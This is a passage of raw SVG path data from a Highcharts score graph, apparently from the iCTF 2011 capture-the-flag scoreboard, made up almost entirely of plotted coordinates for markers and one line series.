stroke-width="0.000001"></path><path d="M 5.672000000000001 234.172 L 11.328 234.172 11.328 239.828 5.672000000000001 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 4.172000000000001 234.172 L 9.828 234.172 9.828 239.828 4.172000000000001 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 2.672 234.172 L 8.328 234.172 8.328 239.828 2.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 1.1720000000000002 234.172 L 6.827999999999999 234.172 6.827999999999999 239.828 1.1720000000000002 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.79392608 L 68.08915441176471 236.79392608 L 69.6171875 236.79392608 L 71.1452205882353 236.79392608 L 72.6732536764706 236.79392608 L 74.20128676470588 236.79392608 L 75.72931985294119 236.79392608 L 77.25735294117648 236.79392608 L 78.78538602941177 236.79392608 L 80.31341911764706 236.79392608 L 81.84145220588236 236.79392608 L 83.36948529411765 236.79392608 L 84.89751838235294 236.79392608 L 86.42555147058825 236.79392608 L 87.95358455882354 236.79392608 L 89.48161764705883 236.79392608 L 91.00965073529413 236.79392608 L 92.53768382352942 236.79392608 L 94.06571691176471 236.79392608 L 95.59375 236.79392608 L 97.1217830882353 236.79392608 L 98.6498161764706 236.79392608 L 100.17784926470588 236.79392608 L 101.70588235294119 236.79392608 L 103.23391544117648 236.79392608 L 104.76194852941177 236.79392608 L 106.28998161764706 236.79392608 L 107.81801470588236 236.79392608 L 109.34604779411765 236.79392608 L 110.87408088235294 236.79392608 L 112.40211397058825 236.79392608 L 113.93014705882354 236.79392608 L 115.45818014705883 236.79392608 L 116.98621323529413 236.79392608 L 118.51424632352942 236.79392608 L 120.04227941176471 236.79392608 L 121.5703125 236.79392608 L 123.0983455882353 236.79392608 L 124.6263786764706 236.79392608 L 126.15441176470588 236.57121568 L 127.68244485294119 236.57121568 L 129.21047794117646 236.57121568 L 130.73851102941177 236.43884448 L 132.26654411764707 236.3858368 L 133.79457720588235 236.3858368 L 135.32261029411765 236.3858368 L 136.85064338235296 236.3858368 L 138.37867647058823 236.28332608 L 139.90670955882354 235.34144224 L 141.43474264705884 234.90177568000001 L 142.96277573529412 234.90177568000001 L 144.49080882352942 234.90177568000001 L 146.01884191176472 234.90177568000001 L 147.546875 234.90177568000001 L 149.0749080882353 234.87327048533336 L 150.6029411764706 234.84748296533337 L 152.13097426470588 234.83289608533337 L 153.6590073529412 234.83289608533337 L 155.18704044117646 234.83289608533337 L 156.71507352941177 234.83289608533337 L 158.24310661764707 234.45226376533338 L 159.77113970588235 233.87524136533335 L 161.29917279411765 233.29889384533337 L 162.82720588235296 233.23478024533335 L 164.35523897058823 233.23478024533335 L 165.88327205882354 233.23478024533335 L 167.41130514705884 233.23478024533335 L 168.93933823529412 233.23478024533335 L 170.46737132352942 233.23478024533335 L 171.99540441176472 233.17052851200012 L 173.5234375 233.17052851200012 L 175.0514705882353 233.11686963200012 L 176.5795036764706 232.59602408533337 L 178.10753676470588 232.048308448 L 179.6355698529412 231.94601084800001 L 181.1636029411765 231.92968743466662 L 182.69163602941177 231.44984775466662 L 184.21966911764707 231.03952071466662 L 185.74770220588235 231.03952071466662 L 187.27573529411765 231.03952071466662 L 188.80376838235296 231.00927898666663 L 190.33180147058823 231.00927898666663 L 191.85983455882354 231.00927898666663 L 193.38786764705884 231.00927898666663 L 194.91590073529412 230.90534746666663 L 196.44393382352942 230.69815930666664 L 197.97196691176472 230.61042490666665 L 199.5 230.61042490666665 L 201.0280330882353 230.61042490666665 L 202.5560661764706 230.61042490666665 L 204.08409926470588 230.4201087466666 L 205.6121323529412 230.37084250666663 L 207.1401654411765 230.37084250666663 L 208.66819852941177 230.37084250666663 L 210.19623161764707 230.31809530666663 L 211.72426470588235 230.31809530666663 L 213.25229779411765 230.31809530666663 L 214.78033088235296 230.31809530666663 L 216.30836397058823 230.31809530666663 L 217.83639705882354 230.31809530666663 L 219.36443014705884 230.31809530666663 L 220.89246323529412 230.20066618666664 L 222.42049632352942 230.20066618666664 L 223.94852941176472 230.14532602666662 L 225.4765625 230.14532602666662 L 227.0045955882353 229.9705321066666 L 228.5326286764706 229.93614874666662 L 230.06066176470588 229.90590701866662 L 231.5886948529412 229.75047228799986 L 233.1167279411765 229.75047228799986 L 234.64476102941177 228.46820028799988 L 236.17279411764707 227.17917948799987 L 237.70082720588238 226.35042684799987 L 239.22886029411765 226.21914492799988 L 240.75689338235296 226.21914492799988 L 242.28492647058823 226.21914492799988 L 243.81295955882354 225.24461820799988 L 245.34099264705884 223.39544700799988 L 246.86902573529412 221.9943961279999 L 248.39705882352942 220.71212412799986 L 249.92509191176472 220.51051260799989 L 251.453125 220.38884239999987 L 252.9811580882353 219.13221583999987 L 254.5091911764706 218.02541263999987 L 256.0372242647059 217.83708559999985 L 257.56525735294116 217.72174505599986 L 259.09329044117646 217.66970115199987 L 260.62132352941177 217.62316205866648 L 262.1493566176471 217.5825271786665 L 263.6773897058824 217.44329667199986 L 265.2054227941177 216.9640213653331 L 266.7334558823529 216.00906616533314 L 268.26148897058823 214.76561752533314 L 269.78952205882354 213.1439519253331 L 271.31755514705884 209.03393272533313 L 272.84558823529414 207.46885048533312 L 274.37362132352945 203.62025848533312 L 275.9016544117647 201.9684048319994 L 277.4296875 197.99803843201124 L 278.9577205882353 197.99803843201124 L 280.4857536764706 197.99803843201124 L 282.0137867647059 197.99803843201124 L 283.54181985294116 197.99803843201124 L 285.06985294117646 197.99803843201124 L 286.59788602941177 197.89275715201123 L 288.1259191176471 197.34070531201124 L 289.6539522058824 197.26114051201125 L 291.1819852941177 196.26366787201124 L 292.7100183823529 195.36607747201123 L 294.23805147058823 194.29031875201122 L 295.76608455882354 194.17700995201125 L 297.29411764705884 194.02017494401122 L 298.82215073529414 193.00785494401123 L 300.35018382352945 191.79577046401124 L 301.8782169117647 190.39202006401123 L 303.40625 188.78310614401124 L 304.9342830882353 188.53212932267786 L 306.4623161764706 188.33379985067785 L 307.9903492647059 188.14489975467785 L 309.51838235294116 188.0599659093445 L 311.04641544117646 187.91201326934447 L 312.57444852941177 186.6015443093445 L 314.1024816176471 186.5115614933445 L 315.6305147058824 186.1637496533445 L 317.1585477941177 185.1481618133445 L 318.6865808823529 183.3273781973445 L 320.21461397058823 182.4770293973445 L 321.74264705882354 181.96479547734447 L 323.27068014705884 181.89024610134447 L 324.79871323529414 181.67988561067773 L 326.32674632352945 181.50274026667773 L 327.8547794117647 181.31774026667773 L 329.3828125 181.18816330667772 L 330.9108455882353 181.07478346667773 L 332.4388786764706 181.01226826667772 L 333.9669117647059 180.95459799467773 L 335.4949448529412 180.8502978560111 L 337.02297794117646 180.64255874134437 L 338.55101102941177 180.39420290134439 L 340.0790441176471 179.97801506134437 L 341.6070772058824 179.71616162134438 L 343.1351102941177 178.56076706134436 L 344.6631433823529 177.49280853334437 L 346.19117647058823 175.12447701334435 L 347.71920955882354 174.88842530134434 L 349.24724264705884 173.47440962134436 L 350.77527573529414 170.80998338134435 L 352.30330882352945 167.90284898134436 L 353.8313419117647 167.64909410134436 L 355.359375 167.64909410134436 L 356.8874080882353 167.64909410134436 L 358.4154411764706 167.64909410134436 L 359.9434742647059 167.64909410134436 L 361.4715073529412 167.5902256213444 L 362.99954044117646 166.93679970134434 L 364.52757352941177 166.84501602134435 L 366.0556066176471 166.75593186134435 L 367.5836397058824 166.67494626134436 L 369.1116727941177 166.62493410134434 L 370.6397058823529 166.59891214934436 L 372.16773897058823 166.50716398934438 L 373.69577205882354 166.44246075734438 L 375.22380514705884 166.33987899734436 L 376.75183823529414 165.61100859734435 L 378.27987132352945 165.33768219734438 L 379.8079044117647 164.66955099734437 L 381.3359375 164.00141979734437 L 382.8639705882353 163.32384027734437 L 384.3920036764706 163.01879451734436 L 385.9200367647059 162.72319707734437 L 387.4480698529412 161.62266118401112 L 388.97610294117646 160.5876083840111 L 390.50413602941177 160.5035645120111 L 392.0321691176471 160.5035645120111 L 393.5602022058824 160.5035645120111 L 395.0882352941177 160.5035645120111" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.79392608 L 68.08915441176471 236.79392608 L 69.6171875 236.79392608 L 71.1452205882353 236.79392608 L 72.6732536764706 236.79392608 L 74.20128676470588 236.79392608 L 75.72931985294119 236.79392608 L 77.25735294117648 236.79392608 L 78.78538602941177 236.79392608 L 80.31341911764706 236.79392608 L 81.84145220588236 236.79392608 L 83.36948529411765 236.79392608 L 84.89751838235294 236.79392608 L 86.42555147058825 236.79392608 L 87.95358455882354 236.79392608 L 89.48161764705883 236.79392608 L 91.00965073529413 236.79392608 L 92.53768382352942 236.79392608 L 94.06571691176471 236.79392608 L 95.59375 236.79392608 L 97.1217830882353 236.79392608 L 98.6498161764706 236.79392608 L 100.17784926470588 236.79392608 L 101.70588235294119 236.79392608 L 103.23391544117648 236.79392608 L 104.76194852941177 236.79392608 L 106.28998161764706 236.79392608 L 107.81801470588236 236.79392608 L 109.34604779411765 236.79392608 L 110.87408088235294 236.79392608 L 112.40211397058825 236.79392608 L 113.93014705882354 236.79392608 L 115.45818014705883 236.79392608 L 116.98621323529413 236.79392608 L 118.51424632352942 236.79392608 L 120.04227941176471 236.79392608 L 121.5703125 236.79392608 L 123.0983455882353 236.79392608 L 124.6263786764706 236.79392608 L 126.15441176470588 236.57121568 L 127.68244485294119 236.57121568 L 129.21047794117646 236.57121568 L 130.73851102941177 236.43884448 L 132.26654411764707 236.3858368 L 133.79457720588235 236.3858368 L 135.32261029411765 236.3858368 L 136.85064338235296 236.3858368 L 138.37867647058823 236.28332608 L 139.90670955882354 235.34144224 L 141.43474264705884 234.90177568000001 L 142.96277573529412 234.90177568000001 L 144.49080882352942 234.90177568000001 L 146.01884191176472 234.90177568000001 L 147.546875 234.90177568000001 L 149.0749080882353 234.87327048533336 L 150.6029411764706 234.84748296533337 L 152.13097426470588 234.83289608533337 L 153.6590073529412 234.83289608533337 L 155.18704044117646 234.83289608533337 L 156.71507352941177 234.83289608533337 L 158.24310661764707 234.45226376533338 L 159.77113970588235 233.87524136533335 L 161.29917279411765 233.29889384533337 L 162.82720588235296 233.23478024533335 L 164.35523897058823 233.23478024533335 L 165.88327205882354 233.23478024533335 L 167.41130514705884 233.23478024533335 L 168.93933823529412 233.23478024533335 L 170.46737132352942 233.23478024533335 L 171.99540441176472 233.17052851200012 L 173.5234375 233.17052851200012 L 175.0514705882353 233.11686963200012 L 176.5795036764706 232.59602408533337 L 178.10753676470588 232.048308448 L 179.6355698529412 231.94601084800001 L 181.1636029411765 231.92968743466662 L 182.69163602941177 231.44984775466662 L 184.21966911764707 231.03952071466662 L 185.74770220588235 231.03952071466662 L 187.27573529411765 231.03952071466662 L 188.80376838235296 231.00927898666663 L 190.33180147058823 231.00927898666663 L 191.85983455882354 231.00927898666663 L 193.38786764705884 231.00927898666663 L 194.91590073529412 230.90534746666663 L 196.44393382352942 230.69815930666664 L 197.97196691176472 230.61042490666665 L 199.5 230.61042490666665 L 201.0280330882353 230.61042490666665 L 202.5560661764706 230.61042490666665 L 204.08409926470588 230.4201087466666 L 205.6121323529412 230.37084250666663 L 207.1401654411765 230.37084250666663 L 208.66819852941177 230.37084250666663 L 210.19623161764707 230.31809530666663 L 211.72426470588235 230.31809530666663 L 213.25229779411765 230.31809530666663 L 214.78033088235296 230.31809530666663 L 216.30836397058823 230.31809530666663 L 217.83639705882354 230.31809530666663 L 219.36443014705884 230.31809530666663 L 220.89246323529412 230.20066618666664 L 222.42049632352942 230.20066618666664 L 223.94852941176472 230.14532602666662 L 225.4765625 230.14532602666662 L 227.0045955882353 229.9705321066666 L 228.5326286764706 229.93614874666662 L 230.06066176470588 229.90590701866662 L 231.5886948529412 229.75047228799986 L 233.1167279411765 229.75047228799986 L 234.64476102941177 228.46820028799988 L 236.17279411764707 227.17917948799987 L 237.70082720588238 226.35042684799987 L 239.22886029411765 226.21914492799988 L 240.75689338235296 226.21914492799988 L 242.28492647058823 226.21914492799988 L 243.81295955882354 225.24461820799988 L 245.34099264705884 223.39544700799988 L 246.86902573529412 221.9943961279999 L 248.39705882352942 220.71212412799986 L 249.92509191176472 220.51051260799989 L 251.453125 220.38884239999987 L 252.9811580882353 219.13221583999987 L 254.5091911764706 218.02541263999987 L 256.0372242647059 217.83708559999985 L 257.56525735294116 217.72174505599986 L 259.09329044117646 217.66970115199987 L 260.62132352941177 217.62316205866648 L 262.1493566176471 217.5825271786665 L 263.6773897058824 217.44329667199986 L 265.2054227941177 216.9640213653331 L 266.7334558823529 216.00906616533314 L 268.26148897058823 214.76561752533314 L 269.78952205882354 213.1439519253331 L 271.31755514705884 209.03393272533313 L 272.84558823529414 207.46885048533312 L 274.37362132352945 203.62025848533312 L 275.9016544117647 201.9684048319994 L 277.4296875 197.99803843201124 L 278.9577205882353 197.99803843201124 L 280.4857536764706 197.99803843201124 L 282.0137867647059 197.99803843201124 L 283.54181985294116 197.99803843201124 L 285.06985294117646 197.99803843201124 L 286.59788602941177 197.89275715201123 L 288.1259191176471 197.34070531201124 L 289.6539522058824 197.26114051201125 L 291.1819852941177 196.26366787201124 L 292.7100183823529 195.36607747201123 L 294.23805147058823 194.29031875201122 L 295.76608455882354 194.17700995201125 L 297.29411764705884 194.02017494401122 L 298.82215073529414 193.00785494401123 L 300.35018382352945 191.79577046401124 L 301.8782169117647 190.39202006401123 L 303.40625 188.78310614401124 L 304.9342830882353 188.53212932267786 L 306.4623161764706 188.33379985067785 L 307.9903492647059 188.14489975467785 L 309.51838235294116 188.0599659093445 L 311.04641544117646 187.91201326934447 L 312.57444852941177 186.6015443093445 L 314.1024816176471 186.5115614933445 L 315.6305147058824 186.1637496533445 L 317.1585477941177 185.1481618133445 L 318.6865808823529 183.3273781973445 L 320.21461397058823 182.4770293973445 L 321.74264705882354 181.96479547734447 L 323.27068014705884 181.89024610134447 L 324.79871323529414 181.67988561067773 L 326.32674632352945 181.50274026667773 L 327.8547794117647 181.31774026667773 L 329.3828125 181.18816330667772 L 330.9108455882353 181.07478346667773 L 332.4388786764706 181.01226826667772 L 333.9669117647059 180.95459799467773 L 335.4949448529412 180.8502978560111 L 337.02297794117646 180.64255874134437 L 338.55101102941177 180.39420290134439 L 340.0790441176471 179.97801506134437 L 341.6070772058824 179.71616162134438 L 343.1351102941177 178.56076706134436 L 344.6631433823529 177.49280853334437 L 346.19117647058823 175.12447701334435 L 347.71920955882354 174.88842530134434 L 349.24724264705884 173.47440962134436 L 350.77527573529414 170.80998338134435 L 352.30330882352945 167.90284898134436 L 353.8313419117647 167.64909410134436 L 355.359375 167.64909410134436 L 356.8874080882353 167.64909410134436 L 358.4154411764706 167.64909410134436 L 359.9434742647059 167.64909410134436 L 361.4715073529412 167.5902256213444 L 362.99954044117646 166.93679970134434 L 364.52757352941177 166.84501602134435 L 366.0556066176471 166.75593186134435 L 367.5836397058824 166.67494626134436 L 369.1116727941177 166.62493410134434 L 370.6397058823529 166.59891214934436 L 372.16773897058823 166.50716398934438 L 373.69577205882354 166.44246075734438 L 375.22380514705884 166.33987899734436 L 376.75183823529414 165.61100859734435 L 378.27987132352945 165.33768219734438 L 379.8079044117647 164.66955099734437 L 381.3359375 164.00141979734437 L 382.8639705882353 163.32384027734437 L 384.3920036764706 163.01879451734436 L 385.9200367647059 162.72319707734437 L 387.4480698529412 161.62266118401112 L 388.97610294117646 160.5876083840111 L 390.50413602941177 160.5035645120111 L 392.0321691176471 160.5035645120111 L 393.5602022058824 160.5035645120111 L 395.0882352941177 160.5035645120111" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.79392608 L 68.08915441176471 236.79392608 L 69.6171875 236.79392608 L 71.1452205882353 236.79392608 L 72.6732536764706 236.79392608 L 74.20128676470588 236.79392608 L 75.72931985294119 236.79392608 L 77.25735294117648 236.79392608 L 78.78538602941177 236.79392608 L 80.31341911764706 236.79392608 L 81.84145220588236 236.79392608 L 83.36948529411765 236.79392608 L 84.89751838235294 236.79392608 L 86.42555147058825 236.79392608 L 87.95358455882354 236.79392608 L 89.48161764705883 236.79392608 L 91.00965073529413 236.79392608 L 92.53768382352942 236.79392608 L 94.06571691176471 236.79392608 L 95.59375 236.79392608 L 97.1217830882353 236.79392608 L 98.6498161764706 236.79392608 L 100.17784926470588 236.79392608 L 101.70588235294119 236.79392608 L 103.23391544117648 236.79392608 L 104.76194852941177 236.79392608 L 106.28998161764706 236.79392608 L 107.81801470588236 236.79392608 L 109.34604779411765 236.79392608 L 110.87408088235294 236.79392608 L 112.40211397058825 236.79392608 L 113.93014705882354 236.79392608 L 115.45818014705883 236.79392608 L 116.98621323529413 236.79392608 L 118.51424632352942 236.79392608 L 120.04227941176471 236.79392608 L 121.5703125 236.79392608 L 123.0983455882353 236.79392608 L 124.6263786764706 236.79392608 L 126.15441176470588 236.57121568 L 127.68244485294119 236.57121568 L 129.21047794117646 236.57121568 L 130.73851102941177 236.43884448 L 132.26654411764707 236.3858368 L 133.79457720588235 236.3858368 L 135.32261029411765 236.3858368 L 136.85064338235296 236.3858368 L 138.37867647058823 236.28332608 L 139.90670955882354 235.34144224 L 141.43474264705884 234.90177568000001 L 142.96277573529412 234.90177568000001 L 144.49080882352942 234.90177568000001 L 146.01884191176472 234.90177568000001 L 147.546875 234.90177568000001 L 149.0749080882353 234.87327048533336 L 150.6029411764706 234.84748296533337 L 152.13097426470588 234.83289608533337 L 153.6590073529412 234.83289608533337 L 155.18704044117646 234.83289608533337 L 156.71507352941177 234.83289608533337 L 158.24310661764707 234.45226376533338 L 159.77113970588235 233.87524136533335 L 161.29917279411765 233.29889384533337 L 162.82720588235296 233.23478024533335 L 164.35523897058823 233.23478024533335 L 165.88327205882354 233.23478024533335 L 167.41130514705884 233.23478024533335 L 168.93933823529412 233.23478024533335 L 170.46737132352942 233.23478024533335 L 171.99540441176472 233.17052851200012 L 173.5234375 233.17052851200012 L 175.0514705882353 233.11686963200012 L 176.5795036764706 232.59602408533337 L 178.10753676470588 232.048308448 L 179.6355698529412 231.94601084800001 L 181.1636029411765 231.92968743466662 L 182.69163602941177 231.44984775466662 L 184.21966911764707 231.03952071466662 L 185.74770220588235 231.03952071466662 L 187.27573529411765 231.03952071466662 L 188.80376838235296 231.00927898666663 L 190.33180147058823 231.00927898666663 L 191.85983455882354 231.00927898666663 L 193.38786764705884 231.00927898666663 L 194.91590073529412 230.90534746666663 L 196.44393382352942 230.69815930666664 L 197.97196691176472 230.61042490666665 L 199.5 230.61042490666665 L 201.0280330882353 230.61042490666665 L 202.5560661764706 230.61042490666665 L 204.08409926470588 230.4201087466666 L 205.6121323529412 230.37084250666663 L 207.1401654411765 230.37084250666663 L 208.66819852941177 230.37084250666663 L 210.19623161764707 230.31809530666663 L 211.72426470588235 230.31809530666663 L 213.25229779411765 230.31809530666663 L 214.78033088235296 230.31809530666663 L 216.30836397058823 230.31809530666663 L 217.83639705882354 230.31809530666663 L 219.36443014705884 230.31809530666663 L 220.89246323529412 230.20066618666664 L 222.42049632352942 230.20066618666664 L 223.94852941176472 230.14532602666662 L 225.4765625 230.14532602666662 L 227.0045955882353 229.9705321066666 L 228.5326286764706 229.93614874666662 L 230.06066176470588 229.90590701866662 L 231.5886948529412 229.75047228799986 L 233.1167279411765 229.75047228799986 L 234.64476102941177 228.46820028799988 L 236.17279411764707 227.17917948799987 L 237.70082720588238 226.35042684799987 L 239.22886029411765 226.21914492799988 L 240.75689338235296 226.21914492799988 L 242.28492647058823 226.21914492799988 L 243.81295955882354 225.24461820799988 L 245.34099264705884 223.39544700799988 L 246.86902573529412 221.9943961279999 L 248.39705882352942 220.71212412799986 L 249.92509191176472 220.51051260799989 L 251.453125 220.38884239999987 L 252.9811580882353 219.13221583999987 L 254.5091911764706 218.02541263999987 L 256.0372242647059 217.83708559999985 L 257.56525735294116 217.72174505599986 L 259.09329044117646 217.66970115199987 L 260.62132352941177 217.62316205866648 L 262.1493566176471 217.5825271786665 L 263.6773897058824 217.44329667199986 L 265.2054227941177 216.9640213653331 L 266.7334558823529 216.00906616533314 L 268.26148897058823 214.76561752533314 L 269.78952205882354 213.1439519253331 L 271.31755514705884 209.03393272533313 L 272.84558823529414 207.46885048533312 L 274.37362132352945 203.62025848533312 L 275.9016544117647 201.9684048319994 L 277.4296875 197.99803843201124 L 278.9577205882353 197.99803843201124 L 280.4857536764706 197.99803843201124 L 282.0137867647059 197.99803843201124 L 283.54181985294116 197.99803843201124 L 285.06985294117646 197.99803843201124 L 286.59788602941177 197.89275715201123 L 288.1259191176471 197.34070531201124 L 289.6539522058824 197.26114051201125 L 291.1819852941177 196.26366787201124 L 292.7100183823529 195.36607747201123 L 294.23805147058823 194.29031875201122 L 295.76608455882354 194.17700995201125 L 297.29411764705884 194.02017494401122 L 298.82215073529414 193.00785494401123 L 300.35018382352945 191.79577046401124 L 301.8782169117647 190.39202006401123 L 303.40625 188.78310614401124 L 304.9342830882353 188.53212932267786 L 306.4623161764706 188.33379985067785 L 307.9903492647059 188.14489975467785 L 309.51838235294116 188.0599659093445 L 311.04641544117646 187.91201326934447 L 312.57444852941177 186.6015443093445 L 314.1024816176471 186.5115614933445 L 315.6305147058824 186.1637496533445 L 317.1585477941177 185.1481618133445 L 318.6865808823529 183.3273781973445 L 320.21461397058823 182.4770293973445 L 321.74264705882354 181.96479547734447 L 323.27068014705884 181.89024610134447 L 324.79871323529414 181.67988561067773 L 326.32674632352945 181.50274026667773 L 327.8547794117647 181.31774026667773 L 329.3828125 181.18816330667772 L 330.9108455882353 181.07478346667773 L 332.4388786764706 181.01226826667772 L 333.9669117647059 180.95459799467773 L 335.4949448529412 180.8502978560111 L 337.02297794117646 180.64255874134437 L 338.55101102941177 180.39420290134439 L 340.0790441176471 179.97801506134437 L 341.6070772058824 179.71616162134438 L 343.1351102941177 178.56076706134436 L 344.6631433823529 177.49280853334437 L 346.19117647058823 175.12447701334435 L 347.71920955882354 174.88842530134434 L 349.24724264705884 173.47440962134436 L 350.77527573529414 170.80998338134435 L 352.30330882352945 167.90284898134436 L 353.8313419117647 167.64909410134436 L 355.359375 167.64909410134436 L 356.8874080882353 167.64909410134436 L 358.4154411764706 167.64909410134436 L 359.9434742647059 167.64909410134436 L 361.4715073529412 167.5902256213444 L 362.99954044117646 166.93679970134434 L 364.52757352941177 166.84501602134435 L 366.0556066176471 166.75593186134435 L 367.5836397058824 166.67494626134436 L 369.1116727941177 166.62493410134434 L 370.6397058823529 166.59891214934436 L 372.16773897058823 166.50716398934438 L 373.69577205882354 166.44246075734438 L 375.22380514705884 166.33987899734436 L 376.75183823529414 165.61100859734435 L 378.27987132352945 165.33768219734438 L 379.8079044117647 164.66955099734437 L 381.3359375 164.00141979734437 L 382.8639705882353 163.32384027734437 L 384.3920036764706 163.01879451734436 L 385.9200367647059 162.72319707734437 L 387.4480698529412 161.62266118401112 L 388.97610294117646 160.5876083840111 L 390.50413602941177 160.5035645120111 L 392.0321691176471 160.5035645120111 L 393.5602022058824 160.5035645120111 L 395.0882352941177 160.5035645120111" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.79392608 L 68.08915441176471 236.79392608 L 69.6171875 236.79392608 L 71.1452205882353 236.79392608 L 72.6732536764706 236.79392608 L 74.20128676470588 236.79392608 L 75.72931985294119 236.79392608 L 77.25735294117648 236.79392608 L 78.78538602941177 236.79392608 L 80.31341911764706 236.79392608 L 81.84145220588236 236.79392608 L 83.36948529411765 236.79392608 L 84.89751838235294 236.79392608 L 86.42555147058825 236.79392608 L 87.95358455882354 236.79392608 L 89.48161764705883 236.79392608 L 91.00965073529413 236.79392608 L 92.53768382352942 236.79392608 L 94.06571691176471 236.79392608 L 95.59375 236.79392608 L 97.1217830882353 236.79392608 L 98.6498161764706 236.79392608 L 100.17784926470588 236.79392608 L 101.70588235294119 236.79392608 L 103.23391544117648 236.79392608 L 104.76194852941177 236.79392608 L 106.28998161764706 236.79392608 L 107.81801470588236 236.79392608 L 109.34604779411765 236.79392608 L 110.87408088235294 236.79392608 L 112.40211397058825 236.79392608 L 113.93014705882354 236.79392608 L 115.45818014705883 236.79392608 L 116.98621323529413 236.79392608 L 118.51424632352942 236.79392608 L 120.04227941176471 236.79392608 L 121.5703125 236.79392608 L 123.0983455882353 236.79392608 L 124.6263786764706 236.79392608 L 126.15441176470588 236.57121568 L 127.68244485294119 236.57121568 L 129.21047794117646 236.57121568 L 130.73851102941177 236.43884448 L 132.26654411764707 236.3858368 L 133.79457720588235 236.3858368 L 135.32261029411765 236.3858368 L 136.85064338235296 236.3858368 L 138.37867647058823 236.28332608 L 139.90670955882354 235.34144224 L 141.43474264705884 234.90177568000001 L 142.96277573529412 234.90177568000001 L 144.49080882352942 234.90177568000001 L 